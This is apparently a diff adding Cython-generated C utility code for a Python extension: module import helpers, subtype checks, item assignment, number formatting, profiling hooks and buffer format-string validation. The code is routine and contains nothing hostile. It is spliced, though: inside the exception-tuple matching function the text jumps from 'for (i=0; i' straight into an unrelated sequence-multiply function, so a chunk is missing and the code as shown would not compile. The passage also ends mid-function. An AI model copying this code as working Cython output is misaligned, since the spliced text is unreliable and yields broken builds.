+} +static PyObject *__Pyx_ImportDottedModule(PyObject *name, PyObject *parts_tuple) { +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030400B1 + PyObject *module = __Pyx__ImportDottedModule_Lookup(name); + if (likely(module)) { + PyObject *spec = __Pyx_PyObject_GetAttrStrNoError(module, __pyx_n_s_spec); + if (likely(spec)) { + PyObject *unsafe = __Pyx_PyObject_GetAttrStrNoError(spec, __pyx_n_s_initializing); + if (likely(!unsafe || !__Pyx_PyObject_IsTrue(unsafe))) { + Py_DECREF(spec); + spec = NULL; + } + Py_XDECREF(unsafe); + } + if (likely(!spec)) { + PyErr_Clear(); + return module; + } + Py_DECREF(spec); + Py_DECREF(module); + } else if (PyErr_Occurred()) { + PyErr_Clear(); + } +#endif + return __Pyx__ImportDottedModule(name, parts_tuple); +} + +/* ssize_strlen */ +static CYTHON_INLINE Py_ssize_t __Pyx_ssize_strlen(const char *s) { + size_t len = strlen(s); + if (unlikely(len > PY_SSIZE_T_MAX)) { + PyErr_SetString(PyExc_OverflowError, "byte string is too long"); + return -1; + } + return (Py_ssize_t) len; +} + +/* FastTypeChecks */ +#if CYTHON_COMPILING_IN_CPYTHON +static int __Pyx_InBases(PyTypeObject *a, PyTypeObject *b) { + while (a) { + a = __Pyx_PyType_GetSlot(a, tp_base, PyTypeObject*); + if (a == b) + return 1; + } + return b == &PyBaseObject_Type; +} +static CYTHON_INLINE int __Pyx_IsSubtype(PyTypeObject *a, PyTypeObject *b) { + PyObject *mro; + if (a == b) return 1; + mro = a->tp_mro; + if (likely(mro)) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(mro); + for (i = 0; i < n; i++) { + if (PyTuple_GET_ITEM(mro, i) == (PyObject *)b) + return 1; + } + return 0; + } + return __Pyx_InBases(a, b); +} +static CYTHON_INLINE int __Pyx_IsAnySubtype2(PyTypeObject *cls, PyTypeObject *a, PyTypeObject *b) { + PyObject *mro; + if (cls == a || cls == b) return 1; + mro = cls->tp_mro; + if (likely(mro)) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(mro); + for (i = 0; i < n; i++) { + PyObject *base = PyTuple_GET_ITEM(mro, i); + if (base == (PyObject *)a || base == (PyObject *)b) + return 1; + } + return 0; + } + return __Pyx_InBases(cls, a) || __Pyx_InBases(cls, b); +} +#if PY_MAJOR_VERSION == 2 +static int __Pyx_inner_PyErr_GivenExceptionMatches2(PyObject *err, PyObject* exc_type1, PyObject* exc_type2) { + PyObject *exception, *value, *tb; + int res; + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ErrFetch(&exception, &value, &tb); + res = exc_type1 ? PyObject_IsSubclass(err, exc_type1) : 0; + if (unlikely(res == -1)) { + PyErr_WriteUnraisable(err); + res = 0; + } + if (!res) { + res = PyObject_IsSubclass(err, exc_type2); + if (unlikely(res == -1)) { + PyErr_WriteUnraisable(err); + res = 0; + } + } + __Pyx_ErrRestore(exception, value, tb); + return res; +} +#else +static CYTHON_INLINE int __Pyx_inner_PyErr_GivenExceptionMatches2(PyObject *err, PyObject* exc_type1, PyObject *exc_type2) { + if (exc_type1) { + return __Pyx_IsAnySubtype2((PyTypeObject*)err, (PyTypeObject*)exc_type1, (PyTypeObject*)exc_type2); + } else { + return __Pyx_IsSubtype((PyTypeObject*)err, (PyTypeObject*)exc_type2); + } +} +#endif +static int __Pyx_PyErr_GivenExceptionMatchesTuple(PyObject *exc_type, PyObject *tuple) { + Py_ssize_t i, n; + assert(PyExceptionClass_Check(exc_type)); + n = PyTuple_GET_SIZE(tuple); +#if PY_MAJOR_VERSION >= 3 + for (i=0; itp_as_sequence && type->tp_as_sequence->sq_repeat)) { + return type->tp_as_sequence->sq_repeat(seq, mul); + } else +#endif + { + return __Pyx_PySequence_Multiply_Generic(seq, mul); + } +} + +/* SetItemInt */ +static int __Pyx_SetItemInt_Generic(PyObject *o, PyObject *j, PyObject *v) { + int r; + if (unlikely(!j)) return -1; + r = PyObject_SetItem(o, j, v); + Py_DECREF(j); + return r; +} +static CYTHON_INLINE int __Pyx_SetItemInt_Fast(PyObject *o, Py_ssize_t i, PyObject *v, int is_list, + CYTHON_NCP_UNUSED int wraparound, CYTHON_NCP_UNUSED int boundscheck) { +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS && CYTHON_USE_TYPE_SLOTS + if (is_list || PyList_CheckExact(o)) { + Py_ssize_t n = (!wraparound) ? i : ((likely(i >= 0)) ? i : i + PyList_GET_SIZE(o)); + if ((!boundscheck) || likely(__Pyx_is_valid_index(n, PyList_GET_SIZE(o)))) { + PyObject* old = PyList_GET_ITEM(o, n); + Py_INCREF(v); + PyList_SET_ITEM(o, n, v); + Py_DECREF(old); + return 1; + } + } else { + PyMappingMethods *mm = Py_TYPE(o)->tp_as_mapping; + PySequenceMethods *sm = Py_TYPE(o)->tp_as_sequence; + if (mm && mm->mp_ass_subscript) { + int r; + PyObject *key = PyInt_FromSsize_t(i); + if (unlikely(!key)) return -1; + r = mm->mp_ass_subscript(o, key, v); + Py_DECREF(key); + return r; + } + if (likely(sm && sm->sq_ass_item)) { + if (wraparound && unlikely(i < 0) && likely(sm->sq_length)) { + Py_ssize_t l = sm->sq_length(o); + if (likely(l >= 0)) { + i += l; + } else { + if (!PyErr_ExceptionMatches(PyExc_OverflowError)) + return -1; + PyErr_Clear(); + } + } + return sm->sq_ass_item(o, i, v); + } + } +#else +#if CYTHON_COMPILING_IN_PYPY + if (is_list || (PySequence_Check(o) && !PyDict_Check(o))) +#else + if (is_list || PySequence_Check(o)) +#endif + { + return PySequence_SetItem(o, i, v); + } +#endif + return __Pyx_SetItemInt_Generic(o, PyInt_FromSsize_t(i), v); +} + +/* RaiseUnboundLocalError */ +static CYTHON_INLINE void __Pyx_RaiseUnboundLocalError(const char *varname) { + PyErr_Format(PyExc_UnboundLocalError, "local variable '%s' referenced before assignment", varname); +} + +/* DivInt[long] */ +static CYTHON_INLINE long __Pyx_div_long(long a, long b) { + long q = a / b; + long r = a - q*b; + q -= ((r != 0) & ((r ^ b) < 0)); + return q; +} + +/* ImportFrom */ +static PyObject* __Pyx_ImportFrom(PyObject* module, PyObject* name) { + PyObject* value = __Pyx_PyObject_GetAttrStr(module, name); + if (unlikely(!value) && PyErr_ExceptionMatches(PyExc_AttributeError)) { + const char* module_name_str = 0; + PyObject* module_name = 0; + PyObject* module_dot = 0; + PyObject* full_name = 0; + PyErr_Clear(); + module_name_str = PyModule_GetName(module); + if (unlikely(!module_name_str)) { goto modbad; } + module_name = PyUnicode_FromString(module_name_str); + if (unlikely(!module_name)) { goto modbad; } + module_dot = PyUnicode_Concat(module_name, __pyx_kp_u__2); + if (unlikely(!module_dot)) { goto modbad; } + full_name = PyUnicode_Concat(module_dot, name); + if (unlikely(!full_name)) { goto modbad; } + #if PY_VERSION_HEX < 0x030700A1 || (CYTHON_COMPILING_IN_PYPY && PYPY_VERSION_NUM < 0x07030400) + { + PyObject *modules = PyImport_GetModuleDict(); + if (unlikely(!modules)) + goto modbad; + value = PyObject_GetItem(modules, full_name); + } + #else + value = PyImport_GetModule(full_name); + #endif + modbad: + Py_XDECREF(full_name); + Py_XDECREF(module_dot); + Py_XDECREF(module_name); + } + if (unlikely(!value)) { + PyErr_Format(PyExc_ImportError, + #if PY_MAJOR_VERSION < 3 + "cannot import name %.230s", PyString_AS_STRING(name)); + #else + "cannot import name %S", name); + #endif + } + return value; +} + +/* HasAttr */ +static CYTHON_INLINE int __Pyx_HasAttr(PyObject *o, PyObject *n) { + PyObject *r; + if (unlikely(!__Pyx_PyBaseString_Check(n))) { + PyErr_SetString(PyExc_TypeError, + "hasattr(): attribute name must be string"); + return -1; + } + r = __Pyx_GetAttr(o, n); + if (!r) { + PyErr_Clear(); + return 0; + } else { + Py_DECREF(r); + return 1; + } +} + +/* StringJoin */ +#if !CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyBytes_Join(PyObject* sep, PyObject* values) { + return PyObject_CallMethodObjArgs(sep, __pyx_n_s_join, values, NULL); +} +#endif + +/* CIntToPyUnicode */ +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_From_size_t(size_t value, Py_ssize_t width, char padding_char, char format_char) { + char digits[sizeof(size_t)*3+2]; + char *dpos, *end = digits + sizeof(size_t)*3+2; + const char *hex_digits = DIGITS_HEX; + Py_ssize_t length, ulength; + int prepend_sign, last_one_off; + size_t remaining; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const size_t neg_one = (size_t) -1, const_zero = (size_t) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (format_char == 'X') { + hex_digits += 16; + format_char = 'x'; + } + remaining = value; + last_one_off = 0; + dpos = end; + do { + int digit_pos; + switch (format_char) { + case 'o': + digit_pos = abs((int)(remaining % (8*8))); + remaining = (size_t) (remaining / (8*8)); + dpos -= 2; + memcpy(dpos, DIGIT_PAIRS_8 + digit_pos * 2, 2); + last_one_off = (digit_pos < 8); + break; + case 'd': + digit_pos = abs((int)(remaining % (10*10))); + remaining = (size_t) (remaining / (10*10)); + dpos -= 2; + memcpy(dpos, DIGIT_PAIRS_10 + digit_pos * 2, 2); + last_one_off = (digit_pos < 10); + break; + case 'x': + *(--dpos) = hex_digits[abs((int)(remaining % 16))]; + remaining = (size_t) (remaining / 16); + break; + default: + assert(0); + break; + } + } while (unlikely(remaining != 0)); + assert(!last_one_off || *dpos == '0'); + dpos += last_one_off; + length = end - dpos; + ulength = length; + prepend_sign = 0; + if (!is_unsigned && value <= neg_one) { + if (padding_char == ' ' || width <= length + 1) { + *(--dpos) = '-'; + ++length; + } else { + prepend_sign = 1; + } + ++ulength; + } + if (width > ulength) { + ulength = width; + } + if (ulength == 1) { + return PyUnicode_FromOrdinal(*dpos); + } + return __Pyx_PyUnicode_BuildFromAscii(ulength, dpos, (int) length, prepend_sign, padding_char); +} + +/* Profile */ +#if CYTHON_PROFILE +static int __Pyx_TraceSetupAndCall(PyCodeObject** code, + PyFrameObject** frame, + PyThreadState* tstate, + const char *funcname, + const char *srcfile, + int firstlineno) { + PyObject *type, *value, *traceback; + int retval; + if (*frame == NULL || !CYTHON_PROFILE_REUSE_FRAME) { + if (*code == NULL) { + *code = __Pyx_createFrameCodeObject(funcname, srcfile, firstlineno); + if (*code == NULL) return 0; + } + *frame = PyFrame_New( + tstate, /*PyThreadState *tstate*/ + *code, /*PyCodeObject *code*/ + __pyx_d, /*PyObject *globals*/ + 0 /*PyObject *locals*/ + ); + if (*frame == NULL) return 0; + if (CYTHON_TRACE && (*frame)->f_trace == NULL) { + Py_INCREF(Py_None); + (*frame)->f_trace = Py_None; + } +#if PY_VERSION_HEX < 0x030400B1 + } else { + (*frame)->f_tstate = tstate; +#endif + } + __Pyx_PyFrame_SetLineNumber(*frame, firstlineno); + retval = 1; + __Pyx_EnterTracing(tstate); + __Pyx_ErrFetchInState(tstate, &type, &value, &traceback); + #if CYTHON_TRACE + if (tstate->c_tracefunc) + retval = tstate->c_tracefunc(tstate->c_traceobj, *frame, PyTrace_CALL, NULL) == 0; + if (retval && tstate->c_profilefunc) + #endif + retval = tstate->c_profilefunc(tstate->c_profileobj, *frame, PyTrace_CALL, NULL) == 0; + __Pyx_LeaveTracing(tstate); + if (retval) { + __Pyx_ErrRestoreInState(tstate, type, value, traceback); + return __Pyx_IsTracing(tstate, 0, 0) && retval; + } else { + Py_XDECREF(type); + Py_XDECREF(value); + Py_XDECREF(traceback); + return -1; + } +} +static PyCodeObject *__Pyx_createFrameCodeObject(const char *funcname, const char *srcfile, int firstlineno) { + PyCodeObject *py_code = 0; +#if PY_MAJOR_VERSION >= 3 + py_code = PyCode_NewEmpty(srcfile, funcname, firstlineno); + if (likely(py_code)) { + py_code->co_flags |= CO_OPTIMIZED | CO_NEWLOCALS; + } +#else + PyObject *py_srcfile = 0; + PyObject *py_funcname = 0; + py_funcname = PyString_FromString(funcname); + if (unlikely(!py_funcname)) goto bad; + py_srcfile = PyString_FromString(srcfile); + if (unlikely(!py_srcfile)) goto bad; + py_code = PyCode_New( + 0, + 0, + 0, + CO_OPTIMIZED | CO_NEWLOCALS, + __pyx_empty_bytes, /*PyObject *code,*/ + __pyx_empty_tuple, /*PyObject *consts,*/ + __pyx_empty_tuple, /*PyObject *names,*/ + __pyx_empty_tuple, /*PyObject *varnames,*/ + __pyx_empty_tuple, /*PyObject *freevars,*/ + __pyx_empty_tuple, /*PyObject *cellvars,*/ + py_srcfile, /*PyObject *filename,*/ + py_funcname, /*PyObject *name,*/ + firstlineno, + __pyx_empty_bytes /*PyObject *lnotab*/ + ); +bad: + Py_XDECREF(py_srcfile); + Py_XDECREF(py_funcname); +#endif + return py_code; +} +#endif + +/* IsLittleEndian */ +static CYTHON_INLINE int __Pyx_Is_Little_Endian(void) +{ + union { + uint32_t u32; + uint8_t u8[4]; + } S; + S.u32 = 0x01020304; + return S.u8[0] == 4; +} + +/* BufferFormatCheck */ +static void __Pyx_BufFmt_Init(__Pyx_BufFmt_Context* ctx, + __Pyx_BufFmt_StackElem* stack, + __Pyx_TypeInfo* type) { + stack[0].field = &ctx->root; + stack[0].parent_offset = 0; + ctx->root.type = type; + ctx->root.name = "buffer dtype"; + ctx->root.offset = 0; + ctx->head = stack; + ctx->head->field = &ctx->root; + ctx->fmt_offset = 0; + ctx->head->parent_offset = 0; + ctx->new_packmode = '@'; + ctx->enc_packmode = '@'; + ctx->new_count = 1; + ctx->enc_count = 0; + ctx->enc_type = 0; + ctx->is_complex = 0; + ctx->is_valid_array = 0; + ctx->struct_alignment = 0; + while (type->typegroup == 'S') { + ++ctx->head; + ctx->head->field = type->fields; + ctx->head->parent_offset = 0; + type = type->fields->type; + } +} +static int __Pyx_BufFmt_ParseNumber(const char** ts) { + int count; + const char* t = *ts; + if (*t < '0' || *t > '9') { + return -1; + } else { + count = *t++ - '0'; + while (*t >= '0' && *t <= '9') { + count *= 10; + count += *t++ - '0'; + } + } + *ts = t; + return count; +} +static int __Pyx_BufFmt_ExpectNumber(const char **ts) { + int number = __Pyx_BufFmt_ParseNumber(ts); + if (number == -1) + PyErr_Format(PyExc_ValueError,\ + "Does not understand character buffer dtype format string ('%c')", **ts); + return number; +} +static void __Pyx_BufFmt_RaiseUnexpectedChar(char ch) { + PyErr_Format(PyExc_ValueError, + "Unexpected format string character: '%c'", ch); +} +static const char* __Pyx_BufFmt_DescribeTypeChar(char ch, int is_complex) { + switch (ch) { + case '?': return "'bool'"; + case 'c': return "'char'"; + case 'b': return "'signed char'"; + case 'B': return "'unsigned char'"; + case 'h': return "'short'"; + case 'H': return "'unsigned short'"; + case 'i': return "'int'"; + case 'I': return "'unsigned int'"; + case 'l': return "'long'"; + case 'L': return "'unsigned long'"; + case 'q': return "'long long'"; + case 'Q': return "'unsigned long long'"; + case 'f': return (is_complex ? "'complex float'" : "'float'"); + case 'd': return (is_complex ? "'complex double'" : "'double'"); + case 'g': return (is_complex ? "'complex long double'" : "'long double'"); + case 'T': return "a struct"; + case 'O': return "Python object"; + case 'P': return "a pointer"; + case 's': case 'p': return "a string"; + case 0: return "end"; + default: return "unparsable format string"; + } +} +static size_t __Pyx_BufFmt_TypeCharToStandardSize(char ch, int is_complex) { + switch (ch) { + case '?': case 'c': case 'b': case 'B': case 's': case 'p': return 1; + case 'h': case 'H': return 2; + case 'i': case 'I': case 'l': case 'L': return 4; + case 'q': case 'Q': return 8; + case 'f': return (is_complex ? 8 : 4); + case 'd': return (is_complex ? 16 : 8); + case 'g': { + PyErr_SetString(PyExc_ValueError, "Python does not define a standard format string size for long double ('g').."); + return 0; + } + case 'O': case 'P': return sizeof(void*); + default: + __Pyx_BufFmt_RaiseUnexpectedChar(ch); + return 0; + } +} +static size_t __Pyx_BufFmt_TypeCharToNativeSize(char ch, int is_complex) { + switch (ch) { + case '?': case 'c': case 'b': case 'B': case 's': case 'p': return 1; + case 'h': case 'H': return sizeof(short); + case 'i': case 'I': return sizeof(int); + case 'l': case 'L': return sizeof(long); + #ifdef HAVE_LONG_LONG + case 'q': case 'Q': return sizeof(PY_LONG_LONG); + #endif + case 'f': return sizeof(float) * (is_complex ? 2 : 1); + case 'd': return sizeof(double) * (is_complex ? 2 : 1); + case 'g': return sizeof(long double) * (is_complex ? 2 : 1); + case 'O': case 'P': return sizeof(void*); + default: { + __Pyx_BufFmt_RaiseUnexpectedChar(ch); + return 0; + } + } +} +typedef struct { char c; short x; } __Pyx_st_short; +typedef struct { char c; int x; } __Pyx_st_int; +typedef struct { char c; long x; } __Pyx_st_long; +typedef struct { char c; float x; } __Pyx_st_float; +typedef struct { char c; double x; } __Pyx_st_double; +typedef struct { char c; long double x; } __Pyx_st_longdouble; +typedef struct { char c; void *x; } __Pyx_st_void_p; +#ifdef HAVE_LONG_LONG +typedef struct { char c; PY_LONG_LONG x; } __Pyx_st_longlong; +#endif +static size_t __Pyx_BufFmt_TypeCharToAlignment(char ch, int is_complex) { + CYTHON_UNUSED_VAR(is_complex); + switch (ch) { + case '?': case 'c': case 'b': case 'B': case 's': case 'p': return 1; + case 'h': case 'H': return sizeof(__Pyx_st_short) - sizeof(short); + case 'i': case 'I': return sizeof(__Pyx_st_int) - sizeof(int); + case 'l': case 'L': return sizeof(__Pyx_st_long) - sizeof(long); +#ifdef HAVE_LONG_LONG + case 'q': case 'Q': return sizeof(__Pyx_st_longlong) - sizeof(PY_LONG_LONG); +#endif + case 'f': return sizeof(__Pyx_st_float) - sizeof(float); + case 'd': return sizeof(__Pyx_st_double) - sizeof(double); + case 'g': return sizeof(__Pyx_st_longdouble) - sizeof(long double); + case 'P': case 'O': return sizeof(__Pyx_st_void_p) - sizeof(void*); + default: + __Pyx_BufFmt_RaiseUnexpectedChar(ch); + return 0; + } +} +/* These are for computing the padding at the end of the struct to align + on the first member of the struct. This will probably the same as above, + but we don't have any guarantees. + */ +typedef struct { short x; char c; } __Pyx_pad_short; +typedef struct { int x; char c; } __Pyx_pad_int; +typedef struct { long x; char c; } __Pyx_pad_long; +typedef struct { float x; char c; } __Pyx_pad_float; +typedef struct { double x; char c; } __Pyx_pad_double; +typedef struct { long double x; char c; } __Pyx_pad_longdouble; +typedef struct { void *x; char c; } __Pyx_pad_void_p; +#ifdef HAVE_LONG_LONG +typedef struct { PY_LONG_LONG x; char c; } __Pyx_pad_longlong; +#endif +static size_t __Pyx_BufFmt_TypeCharToPadding(char ch, int is_complex) { + CYTHON_UNUSED_VAR(is_complex); + switch (ch) { + case '?': case 'c': case 'b': case 'B': case 's': case 'p': return 1; + case 'h': case 'H': return sizeof(__Pyx_pad_short) - sizeof(short); + case 'i': case 'I': return sizeof(__Pyx_pad_int) - sizeof(int); + case 'l': case 'L': return sizeof(__Pyx_pad_long) - sizeof(long); +#ifdef HAVE_LONG_LONG + case 'q': case 'Q': return sizeof(__Pyx_pad_longlong) - sizeof(PY_LONG_LONG); +#endif + case 'f': return sizeof(__Pyx_pad_float) - sizeof(float); + case 'd': return sizeof(__Pyx_pad_double) - sizeof(double); + case 'g': return sizeof(__Pyx_pad_longdouble) - sizeof(long double); + case 'P': case 'O': return sizeof(__Pyx_pad_void_p) - sizeof(void*); + default: + __Pyx_BufFmt_RaiseUnexpectedChar(ch); + return 0; + } +} +static char __Pyx_BufFmt_TypeCharToGroup(char ch, int is_complex) { + switch (ch) { + case 'c': + return 'H'; + case 'b': case 'h': case 'i': + case 'l': case 'q': case 's': case 'p': + return 'I'; + case '?': case 'B': case 'H': case 'I': case 'L': case 'Q': + return 'U'; + case 'f': case 'd': case 'g': + return (is_complex ? 'C' : 'R'); + case 'O': + return 'O'; + case 'P': + return 'P'; + default: { + __Pyx_BufFmt_RaiseUnexpectedChar(ch); + return 0; + } + } +} +static void __Pyx_BufFmt_RaiseExpected(__Pyx_BufFmt_Context* ctx) { + if (ctx->head == NULL || ctx->head->field == &ctx->root) { + const char* expected; + const char* quote; + if (ctx->head == NULL) { + expected = "end"; + quote = ""; + } else { + expected = ctx->head->field->type->name; + quote = "'"; + } + PyErr_Format(PyExc_ValueError, + "Buffer dtype mismatch, expected %s%s%s but got %s", + quote, expected, quote, + __Pyx_BufFmt_DescribeTypeChar(ctx->enc_type, ctx->is_complex)); + } else { + __Pyx_StructField* field = ctx->head->field; + __Pyx_StructField* parent = (ctx->head - 1)->field; + PyErr_Format(PyExc_ValueError, + "Buffer dtype mismatch, expected '%s' but got %s in '%s.%s'", + field->type->name, __Pyx_BufFmt_DescribeTypeChar(ctx->enc_type, ctx->is_complex), + parent->type->name, field->name); + } +} +static int __Pyx_BufFmt_ProcessTypeChunk(__Pyx_BufFmt_Context* ctx) { + char group; + size_t size, offset, arraysize = 1; + if (ctx->enc_type == 0) return 0; + if (ctx->head->field->type->arraysize[0]) { + int i, ndim = 0; + if (ctx->enc_type == 's' || ctx->enc_type == 'p') { + ctx->is_valid_array = ctx->head->field->type->ndim == 1; + ndim = 1; + if (ctx->enc_count != ctx->head->field->type->arraysize[0]) { + PyErr_Format(PyExc_ValueError, + "Expected a dimension of size %zu, got %zu", + ctx->head->field->type->arraysize[0], ctx->enc_count); + return -1; + } + } + if (!ctx->is_valid_array) { + PyErr_Format(PyExc_ValueError, "Expected %d dimensions, got %d", + ctx->head->field->type->ndim, ndim); + return -1; + } + for (i = 0; i < ctx->head->field->type->ndim; i++) { + arraysize *= ctx->head->field->type->arraysize[i]; + } + ctx->is_valid_array = 0; + ctx->enc_count = 1; + } + group = __Pyx_BufFmt_TypeCharToGroup(ctx->enc_type, ctx->is_complex); + do { + __Pyx_StructField* field = ctx->head->field; + __Pyx_TypeInfo* type = field->type; + if (ctx->enc_packmode == '@' || ctx->enc_packmode == '^') { + size = __Pyx_BufFmt_TypeCharToNativeSize(ctx->enc_type, ctx->is_complex); + } else { + size = __Pyx_BufFmt_TypeCharToStandardSize(ctx->enc_type, ctx->is_complex); + } + if (ctx->enc_packmode == '@') { + size_t align_at = __Pyx_BufFmt_TypeCharToAlignment(ctx->enc_type, ctx->is_complex); + size_t align_mod_offset; + if (align_at == 0) return -1; + align_mod_offset = ctx->fmt_offset % align_at; + if (align_mod_offset > 0) ctx->fmt_offset += align_at - align_mod_offset; + if (ctx->struct_alignment == 0) + ctx->struct_alignment = __Pyx_BufFmt_TypeCharToPadding(ctx->enc_type, + ctx->is_complex); + } + if (type->size != size || type->typegroup != group) { + if (type->typegroup == 'C' && type->fields != NULL) { + size_t parent_offset = ctx->head->parent_offset + field->offset; + ++ctx->head; + ctx->head->field = type->fields; + ctx->head->parent_offset = parent_offset; + continue; + } + if ((type->typegroup == 'H' || group == 'H') && type->size == size) { + } else { + __Pyx_BufFmt_RaiseExpected(ctx); + return -1; + } + } + offset = ctx->head->parent_offset + field->offset; + if (ctx->fmt_offset != offset) { + PyErr_Format(PyExc_ValueError, + "Buffer dtype mismatch; next field is at offset %" CYTHON_FORMAT_SSIZE_T "d but %" CYTHON_FORMAT_SSIZE_T "d expected", + (Py_ssize_t)ctx->fmt_offset, (Py_ssize_t)offset); + return -1; + } + ctx->fmt_offset += size; + if (arraysize) + ctx->fmt_offset += (arraysize - 1) * size; + --ctx->enc_count; + while (1) { + if (field == &ctx->root) { + ctx->head = NULL; + if (ctx->enc_count != 0) { + __Pyx_BufFmt_RaiseExpected(ctx); + return -1; + } + break; + } + ctx->head->field = ++field; + if (field->type == NULL) { + --ctx->head; + field = ctx->head->field; + continue; + } else if (field->type->typegroup == 'S') { + size_t parent_offset = ctx->head->parent_offset + field->offset; + if (field->type->fields->type == NULL) continue; + field = field->type->fields; + ++ctx->head; + ctx->head->field = field; + ctx->head->parent_offset = parent_offset; + break; + } else { + break; + } + } + } while (ctx->enc_count); + ctx->enc_type = 0; + ctx->is_complex = 0; + return 0; +} +static PyObject * +__pyx_buffmt_parse_array(__Pyx_BufFmt_Context* ctx, const char** tsp) +{ + const char *ts = *tsp; + int i = 0, number, ndim; + ++ts; + if (ctx->new_count != 1) { + PyErr_SetString(PyExc_ValueError, + "Cannot handle repeated arrays in format string"); + return NULL; + } + if (__Pyx_BufFmt_ProcessTypeChunk(ctx) == -1) return NULL; + ndim = ctx->head->field->type->ndim; + while (*ts && *ts != ')') { + switch (*ts) { + case ' ': case '\f': case '\r': case '\n': case '\t': case '\v': continue; + default: break; + } + number = __Pyx_BufFmt_ExpectNumber(&ts); + if (number == -1) return NULL; + if (i < ndim && (size_t) number != ctx->head->field->type->arraysize[i]) + return PyErr_Format(PyExc_ValueError, + "Expected a dimension of size %zu, got %d", + ctx->head->field->type->arraysize[i], number); + if (*ts != ',' && *ts != ')') + return PyErr_Format(PyExc_ValueError, + "Expected a comma in format string, got '%c'", *ts); + if (*ts == ',') ts++; + i++; + } + if (i != ndim) + return PyErr_Format(PyExc_ValueError, "Expected %d dimension(s), got %d", + ctx->head->field->type->ndim, i); + if (!*ts) { + PyErr_SetString(PyExc_ValueError, + "Unexpected end of format string, expected ')'"); + return NULL; + } + ctx->is_valid_array = 1; + ctx->new_count = 1; + *tsp = ++ts; + return Py_None; +} +static const char* __Pyx_BufFmt_CheckString(__Pyx_BufFmt_Context* ctx, const char* ts) { + int got_Z = 0; + while (1) { + switch(*ts) { + case 0: + if (ctx->enc_type != 0 && ctx->head == NULL) { + __Pyx_BufFmt_RaiseExpected(ctx); + return NULL; + } + if (__Pyx_BufFmt_ProcessTypeChunk(ctx) == -1) return NULL; + if (ctx->head != NULL) { + __Pyx_BufFmt_RaiseExpected(ctx); + return NULL; + } + return ts; + case ' ': + case '\r': + case '\n': + ++ts; + break; + case '<': + if (!__Pyx_Is_Little_Endian()) { + PyErr_SetString(PyExc_ValueError, "Little-endian buffer not supported on big-endian compiler"); + return NULL; + } + ctx->new_packmode = '='; + ++ts; + break; + case '>': + case '!': + if (__Pyx_Is_Little_Endian()) { + PyErr_SetString(PyExc_ValueError, "Big-endian buffer not supported on little-endian compiler"); + return NULL; + } + ctx->new_packmode = '='; + ++ts; + break; + case '=': + case '@': + case '^': + ctx->new_packmode = *ts++; + break; + case 'T': + { + const char* ts_after_sub; + size_t i, struct_count = ctx->new_count; + size_t struct_alignment = ctx->struct_alignment; + ctx->new_count = 1; + ++ts; + if (*ts != '{') { + PyErr_SetString(PyExc_ValueError, "Buffer acquisition: Expected '{' after 'T'"); + return NULL; + } + if (__Pyx_BufFmt_ProcessTypeChunk(ctx) == -1) return NULL; + ctx->enc_type = 0; + ctx->enc_count = 0; + ctx->struct_alignment = 0; + ++ts; + ts_after_sub = ts; + for (i = 0; i != struct_count; ++i) { + ts_after_sub = __Pyx_BufFmt_CheckString(ctx, ts); + if (!ts_after_sub) return NULL; + } + ts = ts_after_sub; + if (struct_alignment) ctx->struct_alignment = struct_alignment; + } + break; + case '}': + { + size_t alignment = ctx->struct_alignment; + ++ts; + if (__Pyx_BufFmt_ProcessTypeChunk(ctx) == -1) return NULL; + ctx->enc_type = 0; + if (alignment && ctx->fmt_offset % alignment) { + ctx->fmt_offset += alignment - (ctx->fmt_offset % alignment); + } + } + return ts; + case 'x': + if (__Pyx_BufFmt_ProcessTypeChunk(ctx) == -1) return NULL; + ctx->fmt_offset += ctx->new_count; + ctx->new_count = 1; + ctx->enc_count = 0; + ctx->enc_type = 0; + ctx->enc_packmode = ctx->new_packmode; + ++ts; + break; + case 'Z': + got_Z = 1; + ++ts; + if (*ts != 'f' && *ts != 'd' && *ts != 'g') { + __Pyx_BufFmt_RaiseUnexpectedChar('Z'); + return NULL; + } + CYTHON_FALLTHROUGH; + case '?': case 'c': case 'b': case 'B': case 'h': case 'H': case 'i': case 'I': + case 'l': case 'L': case 'q': case 'Q': + case 'f': case 'd': case 'g': + case 'O': case 'p': + if ((ctx->enc_type == *ts) && (got_Z == ctx->is_complex) && + (ctx->enc_packmode == ctx->new_packmode) && (!ctx->is_valid_array)) { + ctx->enc_count += ctx->new_count; + ctx->new_count = 1; + got_Z = 0; + ++ts; + break; + } + CYTHON_FALLTHROUGH; + case 's': + if (__Pyx_BufFmt_ProcessTypeChunk(ctx) == -1) return NULL; + ctx->enc_count = ctx->new_count; + ctx->enc_packmode = ctx->new_packmode; + ctx->enc_type = *ts; + ctx->is_complex = got_Z; + ++ts; + ctx->new_count = 1; + got_Z = 0; + break; + case ':': + ++ts; + while(*ts != ':') ++ts; + ++ts; + break; + case '(': + if (!__pyx_buffmt_parse_array(ctx, &ts)) return NULL; + break; + default: + { + int number = __Pyx_BufFmt_ExpectNumber(&ts); + if (number == -1) return NULL; + ctx->new_count = (size_t)number; + } + } + } +} + +/* BufferGetAndValidate */ + static CYTHON_INLINE void __Pyx_SafeReleaseBuffer(Py_buffer* info) { + if (unlikely(info->buf == NULL)) return; + if (info->suboffsets == __Pyx_minusones) info->suboffsets = NULL; + __Pyx_ReleaseBuffer(info); +} +static void __Pyx_ZeroBuffer(Py_buffer* buf) { + buf->buf = NULL; + buf->obj = NULL; + buf->strides = __Pyx_zeros; + buf->shape = __Pyx_zeros; + buf->suboffsets = __Pyx_minusones; +} +static int __Pyx__GetBufferAndValidate( + Py_buffer* buf, PyObject* obj, __Pyx_TypeInfo* dtype, int flags, + int nd, int cast, __Pyx_BufFmt_StackElem* stack) +{ + buf->buf = NULL; + if (unlikely(__Pyx_GetBuffer(obj, buf, flags) == -1)) { + __Pyx_ZeroBuffer(buf); + return -1; + } + if (unlikely(buf->ndim != nd)) { + PyErr_Format(PyExc_ValueError, + "Buffer has wrong number of dimensions (expected %d, got %d)", + nd, buf->ndim); + goto fail; + } + if (!cast) { + 